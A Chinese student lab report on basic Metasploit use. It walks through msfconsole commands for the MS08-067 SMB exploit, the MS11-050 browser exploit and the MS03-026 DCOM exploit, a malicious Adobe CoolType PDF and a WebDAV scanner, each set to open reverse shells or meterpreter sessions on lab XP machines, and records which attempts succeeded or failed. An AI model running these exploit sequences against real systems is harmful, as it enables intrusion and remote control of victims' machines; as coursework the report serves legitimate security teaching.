1. 程式人生 > >20155229《網絡對抗技術》Exp5:MSF基礎應用

20155229《網絡對抗技術》Exp5:MSF基礎應用

targe ret 研究 完成 系統類型 show ref coo AR

實驗內容

本實踐目標是掌握metasploit的基本應用方式,重點常用的三種攻擊方式的思路。具體需要完成:

  • 一個主動攻擊實踐,如ms08-067;

  • 一個針對瀏覽器的攻擊,如ms11-050;

  • 一個針對客戶端的攻擊,如Adobe;

  • 成功應用任何一個輔助模塊。

  • 以上四個小實踐可不限於以上示例,並要求至少有一個是和其他所有同學不一樣的。


主動攻擊實踐 MS08-067漏洞

  • msfconsole進入msf控制臺
  • search ms08_067查看該漏洞

技術分享圖片

  • use exploit/windows/smb/ms08_067_netapi使用該漏洞
  • show payloads回鏈攻擊載荷技術分享圖片

  • set payload generic/shell_reverse_tcp

    tcp反向回連

  • set LHOST 192.168.126.128攻擊機的ip地址

  • set LPORT 5229 攻擊的端口

  • set RHOST 192.168.126.136靶機的ip地址

  • set target 0 選擇目標系統類型

  • exploit 進行攻擊

  • 下圖中展現了攻擊成功

技術分享圖片

  • 在kali中輸入ipconfig查看靶機的ip地址

技術分享圖片

  • 在XP中查看靶機的ip地址,兩者相比較,完全一樣。

技術分享圖片

針對瀏覽器的攻擊 ms11_050

  • 進入msfconsole控制臺

  • 輸入use windows/browser/ms11_050_mshtml_cobjectelement命令使用ms11_050漏洞

  • 輸入set payload windows/meterpreter/reverse_http

    命令使用http反向連接

  • 設置kali的IP地址set LHOST 192.168.126.128
  • 設置端口set LPORT 5229
  • 設置資源標識符路徑set URIPATH fyh5229
  • 進行攻擊exploit

技術分享圖片
將上圖的LOCAL IP 的網址輸入進WIN XP中的IE瀏覽器中,出現遇到問題需要關閉的窗口。同時360已經給出需要修復的通知。

技術分享圖片

  • 但是回到KALI建立會話時,IE瀏覽器已經關閉該網頁。

  • 設置瀏覽器的選項,將安全等級設為最低,且啟動了插件設置,但是,會話連接還是失敗。。。

技術分享圖片

會接著研究這個問題的

針對客戶端的攻擊 Adobe

  • 輸入msfconsole進入msf控制臺
  • 輸入search adobe查找和adobe相關的漏洞

  • 我選擇了windows/fileformat/adobe_cooltype_sing

  • 輸入set payload windows/meterpreter/reverse_tcp使用tcp反向連接

  • 設置IP地址及端口號
  • 輸入set FILENAME 5229.pdf命令生成pdf文件
  • 進行攻擊

技術分享圖片

  • 下圖為成功生成PDF文件的標誌。

技術分享圖片

  • 根據存儲路徑,找到PDF文件並將其放進靶機裏。
  • 但我找了很久都沒有找到該文件,後來,如下圖,選擇顯示隱藏文件,這時就能找到隱藏的文件夾了。

技術分享圖片

  • 我先將改文件復制進了我的主機中,立馬被360刪除了。

技術分享圖片

  • 在msf中進入監聽模式
  • set payload windows/meterpreter/reverse_tcptcp反向連接
  • 設置ip地址和端口號
  • 進行攻擊

技術分享圖片

  • 在XP上打開5229.pdf文件,kali中顯示攻擊成功

技術分享圖片

  • 輸入ipconfig,顯示的是xp的ip地址,證明攻擊正確。

技術分享圖片


輔助模塊 webdav

webdav: WebDAV 一種基於 HTTP 1.1協議的通信協議。由於 WebDAV 已與 Windows XP 和 IIS 集成,因此它具有這兩者所提供的安全特性。其中包括 Internet 信息服務管理單元中指定的 IIS 權限和 NTFS 文件系統中的自由選擇訪問控制列表 (DACL)。

  • 進入msf控制臺
  • 使用show auxiliary命令顯示所有的輔助模塊以及他們的用途。

技術分享圖片

  • 選擇scanner/http/webdav_scanner
  • show options查看該漏洞的配置選項

技術分享圖片

技術分享圖片

  • 設置了kali的ip地址和線程
  • 進行攻擊

技術分享圖片

  • 攻擊的結果如上圖所示,但是該靶機沒有裝IIS。
  • 參考WindowsXP系統如何啟用IIS安裝IIS

技術分享圖片

  • 允許webdav,再次進行攻擊,會得到[*] 192.168.126.128 (Microsoft-IIS/6.0) has WEBDAV ENABLED的消息。

RPC接口長主機名遠程緩沖區溢出漏洞(MS03-026)

  • Remote Procedure Call (RPC)是Windows操作系統使用的一種遠程過程調用協議,RPC提供進程間交互通信機制,允許在某臺計算機上運行的程序無縫地在遠程系統上執行代碼。

  • 使用use exploit/windows/dcerpc/ms03_026_dcom
  • 使用set payload windows/meterpreter/reverse_tcptcp反向連接
  • show options 查看該漏洞的配置選項

  • set LHOST 192.168.126.128 設置主機ip

  • set RHOST 192.168.126.137 設置反彈shell的ip

技術分享圖片

  • 進行攻擊,攻擊成功,但是沒辦法建立會話。

"無會話已創建"消息發生的情況:

① 使用的漏洞利用對所選擇的目標不起作用。可以
是一個不同版本的漏洞,或目標配置有問題。


② 您使用的漏洞利用被配置為使用不創建的有效載荷 
互動會話。

  • 根據以上提示,show options中顯示Windows NT SP3-6a/2000/XP/2003 Universal都可以使用,檢測了自己的虛擬機,且使用Microsoft Windows XP ProfessionalMicrosoft Windows XP Professional SP2兩個版本的虛擬機,都無法建立會話。

  • 檢查了所攻擊的漏洞,無誤。

  • 因為該漏洞與RPC協議還有遠程有關,所以我分別打開了虛擬機中的WindowsXP系統安全設置:關閉遠程協助和服務(關閉的地方換成打開) 和 XP上顯示 ‘RPC 服務器不可用’是什麽意思但是還是無法建立會話。

  • 好了,我真的是沒法解決這個問題了。。。


實驗後問題回答

  • 用自己的話解釋什麽是exploit,payload,encode.

  • exploit英文翻譯為利用,黑客就是利用漏洞對電腦進行攻擊,有漏洞不一定可以利用,但可以利用的一定有漏洞。
  • payload:有效載荷。通常在傳輸數據時,為了使數據傳輸更可靠,要把原始數據分批傳輸,並且在每一批數據的頭和尾都加上一定的輔助信息,而其中的原始數據就是payload
  • encode:編碼器,用來給payload進行編碼,保護payload不被發現


實驗總結與體會

這次實驗其實不難,但是不代表每次攻擊都能成功,也不代表每次攻擊都能成功建立會話,我做了好幾個實驗,成功的占少數,還有些失敗的我沒寫上來。

雖然失敗的占多數,但無疑這次實驗通過自己查找資料學習漏洞學到了很多知識。

20155229《網絡對抗技術》Exp5:MSF基礎應用